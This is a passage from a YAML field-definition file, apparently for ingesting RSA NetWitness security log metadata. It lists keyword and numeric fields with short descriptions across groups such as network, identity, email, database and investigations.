node Like: a physical disk, printer, etc'
- name: param
overwrite: true
type: keyword
description: This key is the parameters passed as part of a command or application,
etc.
- name: change_attrib
overwrite: true
type: keyword
description: "This key is used to capture the name of the attribute that\u2019\
s changing in a session"
- name: event_computer
overwrite: true
type: keyword
description: This key is a windows only concept, where this key is used to capture
fully qualified domain name in a windows log.
- name: reference_id1
overwrite: true
type: keyword
description: This key is for Linked ID to be used as an addition to "reference.id"
- name: event_log
overwrite: true
type: keyword
description: This key captures the Name of the event log
- name: OS
overwrite: true
type: keyword
description: This key captures the Name of the Operating System
- name: terminal
overwrite: true
type: keyword
description: This key captures the Terminal Names only
- name: msgIdPart3
overwrite: true
type: keyword
- name: filter
overwrite: true
type: keyword
description: This key captures Filter used to reduce result set
- name: serial_number
overwrite: true
type: keyword
description: This key is the Serial number associated with a physical asset.
- name: checksum
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the entity
such as a file or process. Checksum should be used over checksum.src or checksum.dst
when it is unclear whether the entity is a source or target of an action.
- name: event_user
overwrite: true
type: keyword
description: This key is a windows only concept, where this key is used to capture
combination of domain name and username in a windows log.
- name: virusname
overwrite: true
type: keyword
description: This key captures the name of the virus
- name: content_type
overwrite: true
type: keyword
description: This key is used to capture Content Type only.
- name: group_id
overwrite: true
type: keyword
description: This key captures Group ID Number (related to the group name)
- name: policy_id
overwrite: true
type: keyword
description: This key is used to capture the Policy ID only, this should be
a numeric value, use policy.name otherwise
- name: vsys
overwrite: true
type: keyword
description: This key captures Virtual System Name
- name: connection_id
overwrite: true
type: keyword
description: This key captures the Connection ID
- name: reference_id2
overwrite: true
type: keyword
description: This key is for the 2nd Linked ID. Can be either linked to "reference.id"
or "reference.id1" value but should not be used unless the other two variables
are in play.
- name: sensor
overwrite: true
type: keyword
description: This key captures Name of the sensor. Typically used in IDS/IPS
based devices
- name: sig_id
overwrite: true
type: long
description: This key captures IDS/IPS Int Signature ID
- name: port_name
overwrite: true
type: keyword
description: 'This key is used for Physical or logical port connection but does
NOT include a network port. (Example: Printer port name).'
- name: rule_group
overwrite: true
type: keyword
description: This key captures the Rule group name
- name: risk_num
overwrite: true
type: double
description: This key captures a Numeric Risk value
- name: trigger_val
overwrite: true
type: keyword
description: This key captures the Value of the trigger or threshold condition.
- name: log_session_id1
overwrite: true
type: keyword
description: This key is used to capture a Linked (Related) Session ID from
the session directly
- name: comp_version
overwrite: true
type: keyword
description: This key captures the Version level of a sub-component of a product.
- name: content_version
overwrite: true
type: keyword
description: This key captures Version level of a signature or database content.
- name: hardware_id
overwrite: true
type: keyword
description: This key is used to capture unique identifier for a device or system
(NOT a Mac address)
- name: risk
overwrite: true
type: keyword
description: This key captures the non-numeric risk value
- name: event_id
overwrite: true
type: keyword
- name: reason
overwrite: true
type: keyword
- name: status
overwrite: true
type: keyword
- name: mail_id
overwrite: true
type: keyword
description: This key is used to capture the mailbox id/name
- name: rule_uid
overwrite: true
type: keyword
description: This key is the Unique Identifier for a rule.
- name: trigger_desc
overwrite: true
type: keyword
description: This key captures the Description of the trigger or threshold condition.
- name: inout
overwrite: true
type: keyword
- name: p_msgid
overwrite: true
type: keyword
- name: data_type
overwrite: true
type: keyword
- name: msgIdPart4
overwrite: true
type: keyword
- name: error
overwrite: true
type: keyword
description: This key captures All non successful Error codes or responses
- name: index
overwrite: true
type: keyword
- name: listnum
overwrite: true
type: keyword
description: This key is used to capture listname or listnumber, primarily for
collecting access-list
- name: ntype
overwrite: true
type: keyword
- name: observed_val
overwrite: true
type: keyword
description: This key captures the Value observed (from the perspective of the
device generating the log).
- name: policy_value
overwrite: true
type: keyword
description: This key captures the contents of the policy. This contains details
about the policy
- name: pool_name
overwrite: true
type: keyword
description: This key captures the name of a resource pool
- name: rule_template
overwrite: true
type: keyword
description: A default set of parameters which are overlayed onto a rule (or
rulename) which efffectively constitutes a template
- name: count
overwrite: true
type: keyword
- name: number
overwrite: true
type: keyword
- name: sigcat
overwrite: true
type: keyword
- name: type
overwrite: true
type: keyword
- name: comments
overwrite: true
type: keyword
description: Comment information provided in the log message
- name: doc_number
overwrite: true
type: long
description: This key captures File Identification number
- name: expected_val
overwrite: true
type: keyword
description: This key captures the Value expected (from the perspective of the
device generating the log).
- name: job_num
overwrite: true
type: keyword
description: This key captures the Job Number
- name: spi_dst
overwrite: true
type: keyword
description: Destination SPI Index
- name: spi_src
overwrite: true
type: keyword
description: Source SPI Index
- name: code
overwrite: true
type: keyword
- name: agent_id
overwrite: true
type: keyword
description: This key is used to capture agent id
- name: message_body
overwrite: true
type: keyword
description: This key captures the The contents of the message body.
- name: phone
overwrite: true
type: keyword
- name: sig_id_str
overwrite: true
type: keyword
description: This key captures a string object of the sigid variable.
- name: cmd
overwrite: true
type: keyword
- name: misc
overwrite: true
type: keyword
- name: name
overwrite: true
type: keyword
- name: cpu
overwrite: true
type: long
description: This key is the CPU time used in the execution of the event being
recorded.
- name: event_desc
overwrite: true
type: keyword
description: This key is used to capture a description of an event available
directly or inferred
- name: sig_id1
overwrite: true
type: long
description: This key captures IDS/IPS Int Signature ID. This must be linked
to the sig.id
- name: im_buddyid
overwrite: true
type: keyword
- name: im_client
overwrite: true
type: keyword
- name: im_userid
overwrite: true
type: keyword
- name: pid
overwrite: true
type: keyword
- name: priority
overwrite: true
type: keyword
- name: context_subject
overwrite: true
type: keyword
description: This key is to be used in an audit context where the subject is
the object being identified
- name: context_target
overwrite: true
type: keyword
- name: cve
overwrite: true
type: keyword
description: This key captures CVE (Common Vulnerabilities and Exposures) -
an identifier for known information security vulnerabilities.
- name: fcatnum
overwrite: true
type: keyword
description: This key captures Filter Category Number. Legacy Usage
- name: library
overwrite: true
type: keyword
description: This key is used to capture library information in mainframe devices
- name: parent_node
overwrite: true
type: keyword
description: This key captures the Parent Node Name. Must be related to node
variable.
- name: risk_info
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: tcp_flags
overwrite: true
type: long
description: This key is captures the TCP flags set in any packet of session
- name: tos
overwrite: true
type: long
description: This key describes the type of service
- name: vm_target
overwrite: true
type: keyword
description: VMWare Target **VMWARE** only varaible.
- name: workspace
overwrite: true
type: keyword
description: This key captures Workspace Description
- name: command
overwrite: true
type: keyword
- name: event_category
overwrite: true
type: keyword
- name: facilityname
overwrite: true
type: keyword
- name: forensic_info
overwrite: true
type: keyword
- name: jobname
overwrite: true
type: keyword
- name: mode
overwrite: true
type: keyword
- name: policy
overwrite: true
type: keyword
- name: policy_waiver
overwrite: true
type: keyword
- name: second
overwrite: true
type: keyword
- name: space1
overwrite: true
type: keyword
- name: subcategory
overwrite: true
type: keyword
- name: tbdstr2
overwrite: true
type: keyword
- name: alert_id
overwrite: true
type: keyword
description: Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: checksum_dst
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the the target
entity such as a process or file.
- name: checksum_src
overwrite: true
type: keyword
description: This key is used to capture the checksum or hash of the source
entity such as a file or process.
- name: fresult
overwrite: true
type: long
description: This key captures the Filter Result
- name: payload_dst
overwrite: true
type: keyword
description: This key is used to capture destination payload
- name: payload_src
overwrite: true
type: keyword
description: This key is used to capture source payload
- name: pool_id
overwrite: true
type: keyword
description: This key captures the identifier (typically numeric field) of a
resource pool
- name: process_id_val
overwrite: true
type: keyword
description: This key is a failure key for Process ID when it is not an integer
value
- name: risk_num_comm
overwrite: true
type: double
description: This key captures Risk Number Community
- name: risk_num_next
overwrite: true
type: double
description: This key captures Risk Number NextGen
- name: risk_num_sand
overwrite: true
type: double
description: This key captures Risk Number SandBox
- name: risk_num_static
overwrite: true
type: double
description: This key captures Risk Number Static
- name: risk_suspicious
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: risk_warning
overwrite: true
type: keyword
description: Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*)
- name: snmp_oid
overwrite: true
type: keyword
description: SNMP Object Identifier
- name: sql
overwrite: true
type: keyword
description: This key captures the SQL query
- name: vuln_ref
overwrite: true
type: keyword
description: This key captures the Vulnerability Reference details
- name: acl_id
overwrite: true
type: keyword
- name: acl_op
overwrite: true
type: keyword
- name: acl_pos
overwrite: true
type: keyword
- name: acl_table
overwrite: true
type: keyword
- name: admin
overwrite: true
type: keyword
- name: alarm_id
overwrite: true
type: keyword
- name: alarmname
overwrite: true
type: keyword
- name: app_id
overwrite: true
type: keyword
- name: audit
overwrite: true
type: keyword
- name: audit_object
overwrite: true
type: keyword
- name: auditdata
overwrite: true
type: keyword
- name: benchmark
overwrite: true
type: keyword
- name: bypass
overwrite: true
type: keyword
- name: cache
overwrite: true
type: keyword
- name: cache_hit
overwrite: true
type: keyword
- name: cefversion
overwrite: true
type: keyword
- name: cfg_attr
overwrite: true
type: keyword
- name: cfg_obj
overwrite: true
type: keyword
- name: cfg_path
overwrite: true
type: keyword
- name: changes
overwrite: true
type: keyword
- name: client_ip
overwrite: true
type: keyword
- name: clustermembers
overwrite: true
type: keyword
- name: cn_acttimeout
overwrite: true
type: keyword
- name: cn_asn_src
overwrite: true
type: keyword
- name: cn_bgpv4nxthop
overwrite: true
type: keyword
- name: cn_ctr_dst_code
overwrite: true
type: keyword
- name: cn_dst_tos
overwrite: true
type: keyword
- name: cn_dst_vlan
overwrite: true
type: keyword
- name: cn_engine_id
overwrite: true
type: keyword
- name: cn_engine_type
overwrite: true
type: keyword
- name: cn_f_switch
overwrite: true
type: keyword
- name: cn_flowsampid
overwrite: true
type: keyword
- name: cn_flowsampintv
overwrite: true
type: keyword
- name: cn_flowsampmode
overwrite: true
type: keyword
- name: cn_inacttimeout
overwrite: true
type: keyword
- name: cn_inpermbyts
overwrite: true
type: keyword
- name: cn_inpermpckts
overwrite: true
type: keyword
- name: cn_invalid
overwrite: true
type: keyword
- name: cn_ip_proto_ver
overwrite: true
type: keyword
- name: cn_ipv4_ident
overwrite: true
type: keyword
- name: cn_l_switch
overwrite: true
type: keyword
- name: cn_log_did
overwrite: true
type: keyword
- name: cn_log_rid
overwrite: true
type: keyword
- name: cn_max_ttl
overwrite: true
type: keyword
- name: cn_maxpcktlen
overwrite: true
type: keyword
- name: cn_min_ttl
overwrite: true
type: keyword
- name: cn_minpcktlen
overwrite: true
type: keyword
- name: cn_mpls_lbl_1
overwrite: true
type: keyword
- name: cn_mpls_lbl_10
overwrite: true
type: keyword
- name: cn_mpls_lbl_2
overwrite: true
type: keyword
- name: cn_mpls_lbl_3
overwrite: true
type: keyword
- name: cn_mpls_lbl_4
overwrite: true
type: keyword
- name: cn_mpls_lbl_5
overwrite: true
type: keyword
- name: cn_mpls_lbl_6
overwrite: true
type: keyword
- name: cn_mpls_lbl_7
overwrite: true
type: keyword
- name: cn_mpls_lbl_8
overwrite: true
type: keyword
- name: cn_mpls_lbl_9
overwrite: true
type: keyword
- name: cn_mplstoplabel
overwrite: true
type: keyword
- name: cn_mplstoplabip
overwrite: true
type: keyword
- name: cn_mul_dst_byt
overwrite: true
type: keyword
- name: cn_mul_dst_pks
overwrite: true
type: keyword
- name: cn_muligmptype
overwrite: true
type: keyword
- name: cn_sampalgo
overwrite: true
type: keyword
- name: cn_sampint
overwrite: true
type: keyword
- name: cn_seqctr
overwrite: true
type: keyword
- name: cn_spackets
overwrite: true
type: keyword
- name: cn_src_tos
overwrite: true
type: keyword
- name: cn_src_vlan
overwrite: true
type: keyword
- name: cn_sysuptime
overwrite: true
type: keyword
- name: cn_template_id
overwrite: true
type: keyword
- name: cn_totbytsexp
overwrite: true
type: keyword
- name: cn_totflowexp
overwrite: true
type: keyword
- name: cn_totpcktsexp
overwrite: true
type: keyword
- name: cn_unixnanosecs
overwrite: true
type: keyword
- name: cn_v6flowlabel
overwrite: true
type: keyword
- name: cn_v6optheaders
overwrite: true
type: keyword
- name: comp_class
overwrite: true
type: keyword
- name: comp_name
overwrite: true
type: keyword
- name: comp_rbytes
overwrite: true
type: keyword
- name: comp_sbytes
overwrite: true
type: keyword
- name: cpu_data
overwrite: true
type: keyword
- name: criticality
overwrite: true
type: keyword
- name: cs_agency_dst
overwrite: true
type: keyword
- name: cs_analyzedby
overwrite: true
type: keyword
- name: cs_av_other
overwrite: true
type: keyword
- name: cs_av_primary
overwrite: true
type: keyword
- name: cs_av_secondary
overwrite: true
type: keyword
- name: cs_bgpv6nxthop
overwrite: true
type: keyword
- name: cs_bit9status
overwrite: true
type: keyword
- name: cs_context
overwrite: true
type: keyword
- name: cs_control
overwrite: true
type: keyword
- name: cs_data
overwrite: true
type: keyword
- name: cs_datecret
overwrite: true
type: keyword
- name: cs_dst_tld
overwrite: true
type: keyword
- name: cs_eth_dst_ven
overwrite: true
type: keyword
- name: cs_eth_src_ven
overwrite: true
type: keyword
- name: cs_event_uuid
overwrite: true
type: keyword
- name: cs_filetype
overwrite: true
type: keyword
- name: cs_fld
overwrite: true
type: keyword
- name: cs_if_desc
overwrite: true
type: keyword
- name: cs_if_name
overwrite: true
type: keyword
- name: cs_ip_next_hop
overwrite: true
type: keyword
- name: cs_ipv4dstpre
overwrite: true
type: keyword
- name: cs_ipv4srcpre
overwrite: true
type: keyword
- name: cs_lifetime
overwrite: true
type: keyword
- name: cs_log_medium
overwrite: true
type: keyword
- name: cs_loginname
overwrite: true
type: keyword
- name: cs_modulescore
overwrite: true
type: keyword
- name: cs_modulesign
overwrite: true
type: keyword
- name: cs_opswatresult
overwrite: true
type: keyword
- name: cs_payload
overwrite: true
type: keyword
- name: cs_registrant
overwrite: true
type: keyword
- name: cs_registrar
overwrite: true
type: keyword
- name: cs_represult
overwrite: true
type: keyword
- name: cs_rpayload
overwrite: true
type: keyword
- name: cs_sampler_name
overwrite: true
type: keyword
- name: cs_sourcemodule
overwrite: true
type: keyword
- name: cs_streams
overwrite: true
type: keyword
- name: cs_targetmodule
overwrite: true
type: keyword
- name: cs_v6nxthop
overwrite: true
type: keyword
- name: cs_whois_server
overwrite: true
type: keyword
- name: cs_yararesult
overwrite: true
type: keyword
- name: description
overwrite: true
type: keyword
- name: devvendor
overwrite: true
type: keyword
- name: distance
overwrite: true
type: keyword
- name: dstburb
overwrite: true
type: keyword
- name: edomain
overwrite: true
type: keyword
- name: edomaub
overwrite: true
type: keyword
- name: euid
overwrite: true
type: keyword
- name: facility
overwrite: true
type: keyword
- name: finterface
overwrite: true
type: keyword
- name: flags
overwrite: true
type: keyword
- name: gaddr
overwrite: true
type: keyword
- name: id3
overwrite: true
type: keyword
- name: im_buddyname
overwrite: true
type: keyword
- name: im_croomid
overwrite: true
type: keyword
- name: im_croomtype
overwrite: true
type: keyword
- name: im_members
overwrite: true
type: keyword
- name: im_username
overwrite: true
type: keyword
- name: ipkt
overwrite: true
type: keyword
- name: ipscat
overwrite: true
type: keyword
- name: ipspri
overwrite: true
type: keyword
- name: latitude
overwrite: true
type: keyword
- name: linenum
overwrite: true
type: keyword
- name: list_name
overwrite: true
type: keyword
- name: load_data
overwrite: true
type: keyword
- name: location_floor
overwrite: true
type: keyword
- name: location_mark
overwrite: true
type: keyword
- name: log_id
overwrite: true
type: keyword
- name: log_type
overwrite: true
type: keyword
- name: logid
overwrite: true
type: keyword
- name: logip
overwrite: true
type: keyword
- name: logname
overwrite: true
type: keyword
- name: longitude
overwrite: true
type: keyword
- name: lport
overwrite: true
type: keyword
- name: mbug_data
overwrite: true
type: keyword
- name: misc_name
overwrite: true
type: keyword
- name: msg_type
overwrite: true
type: keyword
- name: msgid
overwrite: true
type: keyword
- name: netsessid
overwrite: true
type: keyword
- name: num
overwrite: true
type: keyword
- name: number1
overwrite: true
type: keyword
- name: number2
overwrite: true
type: keyword
- name: nwwn
overwrite: true
type: keyword
- name: object
overwrite: true
type: keyword
- name: operation
overwrite: true
type: keyword
- name: opkt
overwrite: true
type: keyword
- name: orig_from
overwrite: true
type: keyword
- name: owner_id
overwrite: true
type: keyword
- name: p_action
overwrite: true
type: keyword
- name: p_filter
overwrite: true
type: keyword
- name: p_group_object
overwrite: true
type: keyword
- name: p_id
overwrite: true
type: keyword
- name: p_msgid1
overwrite: true
type: keyword
- name: p_msgid2
overwrite: true
type: keyword
- name: p_result1
overwrite: true
type: keyword
- name: password_chg
overwrite: true
type: keyword
- name: password_expire
overwrite: true
type: keyword
- name: permgranted
overwrite: true
type: keyword
- name: permwanted
overwrite: true
type: keyword
- name: pgid
overwrite: true
type: keyword
- name: policyUUID
overwrite: true
type: keyword
- name: prog_asp_num
overwrite: true
type: keyword
- name: program
overwrite: true
type: keyword
- name: real_data
overwrite: true
type: keyword
- name: rec_asp_device
overwrite: true
type: keyword
- name: rec_asp_num
overwrite: true
type: keyword
- name: rec_library
overwrite: true
type: keyword
- name: recordnum
overwrite: true
type: keyword
- name: ruid
overwrite: true
type: keyword
- name: sburb
overwrite: true
type: keyword
- name: sdomain_fld
overwrite: true
type: keyword
- name: sec
overwrite: true
type: keyword
- name: sensorname
overwrite: true
type: keyword
- name: seqnum
overwrite: true
type: keyword
- name: session
overwrite: true
type: keyword
- name: sessiontype
overwrite: true
type: keyword
- name: sigUUID
overwrite: true
type: keyword
- name: spi
overwrite: true
type: keyword
- name: srcburb
overwrite: true
type: keyword
- name: srcdom
overwrite: true
type: keyword
- name: srcservice
overwrite: true
type: keyword
- name: state
overwrite: true
type: keyword
- name: status1
overwrite: true
type: keyword
- name: svcno
overwrite: true
type: keyword
- name: system
overwrite: true
type: keyword
- name: tbdstr1
overwrite: true
type: keyword
- name: tgtdom
overwrite: true
type: keyword
- name: tgtdomain
overwrite: true
type: keyword
- name: threshold
overwrite: true
type: keyword
- name: type1
overwrite: true
type: keyword
- name: udb_class
overwrite: true
type: keyword
- name: url_fld
overwrite: true
type: keyword
- name: user_div
overwrite: true
type: keyword
- name: userid
overwrite: true
type: keyword
- name: username_fld
overwrite: true
type: keyword
- name: utcstamp
overwrite: true
type: keyword
- name: v_instafname
overwrite: true
type: keyword
- name: virt_data
overwrite: true
type: keyword
- name: vpnid
overwrite: true
type: keyword
- name: autorun_type
overwrite: true
type: keyword
description: This is used to capture Auto Run type
- name: cc_number
overwrite: true
type: long
description: Valid Credit Card Numbers only
- name: content
overwrite: true
type: keyword
description: This key captures the content type from protocol headers
- name: ein_number
overwrite: true
type: long
description: Employee Identification Numbers only
- name: found
overwrite: true
type: keyword
description: This is used to capture the results of regex match
- name: language
overwrite: true
type: keyword
description: This is used to capture list of languages the client support and
what it prefers
- name: lifetime
overwrite: true
type: long
description: This key is used to capture the session lifetime in seconds.
- name: link
overwrite: true
type: keyword
description: This key is used to link the sessions together. This key should
never be used to parse Meta data from a session (Logs/Packets) Directly, this
is a Reserved key in NetWitness
- name: match
overwrite: true
type: keyword
description: This key is for regex match name from search.ini
- name: param_dst
overwrite: true
type: keyword
description: This key captures the command line/launch argument of the target
process or file
- name: param_src
overwrite: true
type: keyword
description: This key captures source parameter
- name: search_text
overwrite: true
type: keyword
description: This key captures the Search Text used
- name: sig_name
overwrite: true
type: keyword
description: This key is used to capture the Signature Name only.
- name: snmp_value
overwrite: true
type: keyword
description: SNMP set request value
- name: streams
overwrite: true
type: long
description: This key captures number of streams in session
- name: db
overwrite: true
type: group
fields:
- name: index
overwrite: true
type: keyword
description: This key captures IndexID of the index.
- name: instance
overwrite: true
type: keyword
description: This key is used to capture the database server instance name
- name: database
overwrite: true
type: keyword
description: This key is used to capture the name of a database or an instance
as seen in a session
- name: transact_id
overwrite: true
type: keyword
description: This key captures the SQL transantion ID of the current session
- name: permissions
overwrite: true
type: keyword
description: This key captures permission or privilege level assigned to a resource.
- name: table_name
overwrite: true
type: keyword
description: This key is used to capture the table name
- name: db_id
overwrite: true
type: keyword
description: This key is used to capture the unique identifier for a database
- name: db_pid
overwrite: true
type: long
description: This key captures the process id of a connection with database
server
- name: lread
overwrite: true
type: long
description: This key is used for the number of logical reads
- name: lwrite
overwrite: true
type: long
description: This key is used for the number of logical writes
- name: pread
overwrite: true
type: long
description: This key is used for the number of physical writes
- name: network
overwrite: true
type: group
fields:
- name: alias_host
overwrite: true
type: keyword
description: This key should be used when the source or destination context
of a hostname is not clear.Also it captures the Device Hostname. Any Hostname
that isnt ad.computer.
- name: domain
overwrite: true
type: keyword
- name: host_dst
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Hostname"
- name: network_service
overwrite: true
type: keyword
description: This is used to capture layer 7 protocols/service names
- name: interface
overwrite: true
type: keyword
description: This key should be used when the source or destination context
of an interface is not clear
- name: network_port
overwrite: true
type: long
description: 'Deprecated, use port. NOTE: There is a type discrepancy as currently
used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!)'
- name: eth_host
overwrite: true
type: keyword
description: Deprecated, use alias.mac
- name: sinterface
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Source Interface"
- name: dinterface
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Interface"
- name: vlan
overwrite: true
type: long
description: This key should only be used to capture the ID of the Virtual LAN
- name: zone_src
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Source Zone."
- name: zone
overwrite: true
type: keyword
description: This key should be used when the source or destination context
of a Zone is not clear
- name: zone_dst
overwrite: true
type: keyword
description: "This key should only be used when it\u2019s a Destination Zone."
- name: gateway
overwrite: true
type: keyword
description: This key is used to capture the IP Address of the gateway
- name: icmp_type
overwrite: true
type: long
description: This key is used to capture the ICMP type only
- name: mask
overwrite: true
type: keyword
description: This key is used to capture the device network IPmask.
- name: icmp_code
overwrite: true
type: long
description: This key is used to capture the ICMP code only
- name: protocol_detail
overwrite: true
type: keyword
description: This key should be used to capture additional protocol information
- name: dmask
overwrite: true
type: keyword
description: This key is used for Destionation Device network mask
- name: port
overwrite: true
type: long
description: This key should only be used to capture a Network Port when the
directionality is not clear
- name: smask
overwrite: true
type: keyword
description: This key is used for capturing source Network Mask
- name: netname
overwrite: true
type: keyword
description: This key is used to capture the network name associated with an
IP range. This is configured by the end user.
- name: paddr
overwrite: true
type: ip
description: Deprecated
- name: faddr
overwrite: true
type: keyword
- name: lhost
overwrite: true
type: keyword
- name: origin
overwrite: true
type: keyword
- name: remote_domain_id
overwrite: true
type: keyword
- name: addr
overwrite: true
type: keyword
- name: dns_a_record
overwrite: true
type: keyword
- name: dns_ptr_record
overwrite: true
type: keyword
- name: fhost
overwrite: true
type: keyword
- name: fport
overwrite: true
type: keyword
- name: laddr
overwrite: true
type: keyword
- name: linterface
overwrite: true
type: keyword
- name: phost
overwrite: true
type: keyword
- name: ad_computer_dst
overwrite: true
type: keyword
description: Deprecated, use host.dst
- name: eth_type
overwrite: true
type: long
description: This key is used to capture Ethernet Type, Used for Layer 3 Protocols
Only
- name: ip_proto
overwrite: true
type: long
description: This key should be used to capture the Protocol number, all the
protocol nubers are converted into string in UI
- name: dns_cname_record
overwrite: true
type: keyword
- name: dns_id
overwrite: true
type: keyword
- name: dns_opcode
overwrite: true
type: keyword
- name: dns_resp
overwrite: true
type: keyword
- name: dns_type
overwrite: true
type: keyword
- name: domain1
overwrite: true
type: keyword
- name: host_type
overwrite: true
type: keyword
- name: packet_length
overwrite: true
type: keyword
- name: host_orig
overwrite: true
type: keyword
description: This is used to capture the original hostname in case of a Forwarding
Agent or a Proxy in between.
- name: rpayload
overwrite: true
type: keyword
description: This key is used to capture the total number of payload bytes seen
in the retransmitted packets.
- name: vlan_name
overwrite: true
type: keyword
description: This key should only be used to capture the name of the Virtual
LAN
- name: investigations
overwrite: true
type: group
fields:
- name: ec_activity
overwrite: true
type: keyword
description: This key captures the particular event activity(Ex:Logoff)
- name: ec_theme
overwrite: true
type: keyword
description: This key captures the Theme of a particular Event(Ex:Authentication)
- name: ec_subject
overwrite: true
type: keyword
description: This key captures the Subject of a particular Event(Ex:User)
- name: ec_outcome
overwrite: true
type: keyword
description: This key captures the outcome of a particular Event(Ex:Success)
- name: event_cat
overwrite: true
type: long
description: This key captures the Event category number
- name: event_cat_name
overwrite: true
type: keyword
description: This key captures the event category name corresponding to the
event cat code
- name: event_vcat
overwrite: true
type: keyword
description: This is a vendor supplied category. This should be used in situations
where the vendor has adopted their own event_category taxonomy.
- name: analysis_file
overwrite: true
type: keyword
description: This is used to capture all indicators used in a File Analysis.
This key should be used to capture an analysis of a file
- name: analysis_service
overwrite: true
type: keyword
description: This is used to capture all indicators used in a Service Analysis.
This key should be used to capture an analysis of a service
- name: analysis_session
overwrite: true
type: keyword
description: This is used to capture all indicators used for a Session Analysis.
This key should be used to capture an analysis of a session
- name: boc
overwrite: true
type: keyword
description: This is used to capture behaviour of compromise
- name: eoc
overwrite: true
type: keyword
description: This is used to capture Enablers of Compromise
- name: inv_category
overwrite: true
type: keyword
description: This used to capture investigation category
- name: inv_context
overwrite: true
type: keyword
description: This used to capture investigation context
- name: ioc
overwrite: true
type: keyword
description: This is key capture indicator of compromise
- name: counters
overwrite: true
type: group
fields:
- name: dclass_c1
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c1.str only
- name: dclass_c2
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c2.str only
- name: event_counter
overwrite: true
type: long
description: This is used to capture the number of times an event repeated
- name: dclass_r1
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r1.str only
- name: dclass_c3
overwrite: true
type: long
description: This is a generic counter key that should be used with the label
dclass.c3.str only
- name: dclass_c1_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c1 only
- name: dclass_c2_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c2 only
- name: dclass_r1_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r1 only
- name: dclass_r2
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r2.str only
- name: dclass_c3_str
overwrite: true
type: keyword
description: This is a generic counter string key that should be used with the
label dclass.c3 only
- name: dclass_r3
overwrite: true
type: keyword
description: This is a generic ratio key that should be used with the label
dclass.r3.str only
- name: dclass_r2_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r2 only
- name: dclass_r3_str
overwrite: true
type: keyword
description: This is a generic ratio string key that should be used with the
label dclass.r3 only
- name: identity
overwrite: true
type: group
fields:
- name: auth_method
overwrite: true
type: keyword
description: This key is used to capture authentication methods used only
- name: user_role
overwrite: true
type: keyword
description: This key is used to capture the Role of a user only
- name: dn
overwrite: true
type: keyword
description: X.500 (LDAP) Distinguished Name
- name: logon_type
overwrite: true
type: keyword
description: This key is used to capture the type of logon method used.
- name: profile
overwrite: true
type: keyword
description: This key is used to capture the user profile
- name: accesses
overwrite: true
type: keyword
description: This key is used to capture actual privileges used in accessing
an object
- name: realm
overwrite: true
type: keyword
description: Radius realm or similar grouping of accounts
- name: user_sid_dst
overwrite: true
type: keyword
description: This key captures Destination User Session ID
- name: dn_src
overwrite: true
type: keyword
description: An X.500 (LDAP) Distinguished name that is used in a context that
indicates a Source dn
- name: org
overwrite: true
type: keyword
description: This key captures the User organization
- name: dn_dst
overwrite: true
type: keyword
description: An X.500 (LDAP) Distinguished name that used in a context that
indicates a Destination dn
- name: firstname
overwrite: true
type: keyword
description: This key is for First Names only, this is used for Healthcare predominantly
to capture Patients information
- name: lastname
overwrite: true
type: keyword
description: This key is for Last Names only, this is used for Healthcare predominantly
to capture Patients information
- name: user_dept
overwrite: true
type: keyword
description: User's Department Names only
- name: user_sid_src
overwrite: true
type: keyword
description: This key captures Source User Session ID
- name: federated_sp
overwrite: true
type: keyword
description: This key is the Federated Service Provider. This is the application
requesting authentication.
- name: federated_idp
overwrite: true
type: keyword
description: This key is the federated Identity Provider. This is the server
providing the authentication.
- name: logon_type_desc
overwrite: true
type: keyword
description: This key is used to capture the textual description of an integer
logon type as stored in the meta key 'logon.type'.
- name: middlename
overwrite: true
type: keyword
description: This key is for Middle Names only, this is used for Healthcare
predominantly to capture Patients information
- name: password
overwrite: true
type: keyword
description: This key is for Passwords seen in any session, plain text or encrypted
- name: host_role
overwrite: true
type: keyword
description: This key should only be used to capture the role of a Host Machine
- name: ldap
overwrite: true
type: keyword
description: "This key is for Uninterpreted LDAP values. Ldap Values that don\u2019\
t have a clear query or response context"
- name: ldap_query
overwrite: true
type: keyword
description: This key is the Search criteria from an LDAP search
- name: ldap_response
overwrite: true
type: keyword
description: This key is to capture Results from an LDAP search
- name: owner
overwrite: true
type: keyword
description: This is used to capture username the process or service is running
as, the author of the task
- name: service_account
overwrite: true
type: keyword
description: This key is a windows specific key, used for capturing name of
the account a service (referenced in the event) is running under. Legacy Usage
- name: email
overwrite: true
type: group
fields:
- name: email_dst
overwrite: true
type: keyword
description: This key is used to capture the Destination email address only,
when the destination context is not clear use email
- name: email_src
overwrite: true
type: keyword
description: This key is used to capture the source email address only, when
the source context is not clear use email
- name: subject
overwrite: true
type: keyword
description: This key is used to capture the subject string from an Email only.
- name: email
overwrite: true
type: keyword
description: This key is used to capture a generic email address where the source
or destination context is not clear
- name: trans_from
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: trans_to
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: file
overwrite: true
type: group
fields:
- name: privilege
overwrite: true
type: keyword
description: Deprecated, use permissions
- name: attachment
overwrite: true
type: keyword
description: This key captures the attachment file name
- name: filesystem
overwrite: true
type: keyword
- name: binary
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: filename_dst
overwrite: true
type: keyword
description: This is used to capture name of the file targeted by the action
- name: filename_src
overwrite: true
type: keyword
description: This is used to capture name of the parent filename, the file which
performed the action
- name: filename_tmp
overwrite: true
type: keyword
- name: directory_dst
overwrite: true
type: keyword
